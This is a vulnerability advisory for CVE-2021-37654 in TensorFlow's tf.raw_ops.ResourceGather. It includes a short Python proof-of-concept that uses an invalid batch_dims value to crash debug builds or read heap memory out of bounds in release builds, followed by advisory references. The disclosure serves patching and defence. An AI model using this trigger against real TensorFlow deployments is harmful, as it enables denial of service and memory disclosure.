CVE-2021-37654: Heap OOB and CHECK fail in `ResourceGather`
(updated )
An attacker can trigger a crash via a CHECK-fail in debug builds of TensorFlow using tf.raw_ops.ResourceGather or a read from outside the bounds of heap allocated data in the same API in a release build:
import tensorflow as tf
tensor = tf.constant(value=[[1,2],[3,4],[5,6]],shape=(3,2),dtype=tf.uint32)
v = tf.Variable(tensor)
tf.raw_ops.ResourceGather(
resource=v.handle,
indices=[0],
dtype=tf.uint32,
batch_dims=10,
validate_indices=False)
References
- github.com/advisories/GHSA-2r8p-fg3c-wcj4
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-567.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-765.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-276.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/bc9c546ce7015c57c2f15c168b3d9201de679a1d
- github.com/tensorflow/tensorflow/security/advisories/GHSA-2r8p-fg3c-wcj4
- nvd.nist.gov/vuln/detail/CVE-2021-37654
Detect and mitigate CVE-2021-37654 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →